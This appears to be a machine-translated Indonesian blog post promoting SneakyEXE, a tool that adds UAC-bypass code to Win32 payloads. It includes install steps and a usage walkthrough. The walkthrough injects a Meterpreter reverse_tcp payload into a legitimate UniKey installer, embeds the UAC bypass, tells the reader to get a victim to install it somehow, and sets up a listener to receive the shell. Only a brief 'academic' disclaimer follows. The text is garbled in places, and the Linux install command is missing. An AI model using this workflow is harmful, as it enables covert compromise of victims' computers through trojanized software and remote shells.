SneakyEXE: Dan "Melewati UAC" Alat Penyematan Kode Untuk Payload Win32 Anda

  • Whatsapp
SneakyEXE: Dan "Melewati UAC" Alat Penyematan Kode Untuk Payload Win32 Anda


Tentang SneakyEXE
SneakyEXE adalah alat yang membantu Anda menyematkan fungsi UAC-Bypassing ke dalam payload Win32 kustom Anda (khusus arsitektur x86_64).

   SneakyEXE adalah untukested pada:

  • Windows 7, 8, 10 (64 bit)
  • OS Keamanan Parrot 4.7

   Persyaratan SneakyEXE:
  • Untuk Linux:Arsitektur: Opsional
    Python 3.7.x: Ya
    Modul:istilah warna
    Distro: Apa saja
    Versi distro: Any
  • Untuk Windows:Arsitektur: x86_64
    Python 3.7.x: Tidak
    Modul: Tidak
    Versi Windows: 7, 8, 10

Instalasi SneakyEXE untuk Linux
   Anda harus menginstal Python 3 terlebih dahulu:
  • Untuk distro berbasis Debian: sudo apt install python3
  • Untuk distro berbasis Arch Linux: sudo pacman -S python3
   Dan kemudian, buka Terminal Anda dan masukkan perintah ini:

Bacaan Lainnya


Instalasi SneakyEXE untuk Windows
  • Unduh File zip master SneakEXE.
  • Buka zip ke direktori opsional Anda.
  • Ubah dir menjadi SneakyEXEWin32.
  • Menjalankan sneakyexe.exe (atau syssneakyexe.exe untuk meningkatkan kecepatan startup).
  • (Opsional: Anda dapat menyalin sneakyexe.exe ke direktori apa pun yang Anda inginkan dan hapus yang tidak di-zip)
   CATATAN:Payload hanya dapat berhasil dijalankan oleh pengguna dengan hak istimewa Administrator. Pengguna dengan token terbatas tidak akan berhasil.

Instalasi versi GUI SneakyEXE untuk Windows
Anda harus menginstal Python 3 terlebih dahulu.Unduh dan jalankanFile pengaturan Python 3.7.xdariPython.org. DiInstal Python 3.7, aktifkanTambahkan Python 3.7 ke PATH.
Unduh SneakEXE-master file zip dan unzip.
Dan kemudian, buka PowerShell atau CMD pada folder SneakyEXE tempat Anda baru saja membuka ritsleting SneakyEXE-master dan masukkan perintah ini:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


Bagaimana cara menggunakan SneakyEXE?

Contoh:
Saya mengunduh Unikey dari Unikey.org.
Dan kemudian, saya menggunakan msfvenom untuk menyuntikkan muatan ke UniKeyNT.exe (muatan yang digunakan: windows/meterpreter/reverse_tcp). Saya menyebut file payload adalah uNiKeY.exe.


Setelah itu, untuk menyematkan kode UAC-Bypassing ke uNiKeY.exe, saya menggunakan perintah ini:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE


Dan kemudian, entah bagaimana, membuat korban Anda menginstal muatan yang disematkanKode UAC-Bypassing dan masukkan perintah ini:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


dan tunggu…

Penolakan:

  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *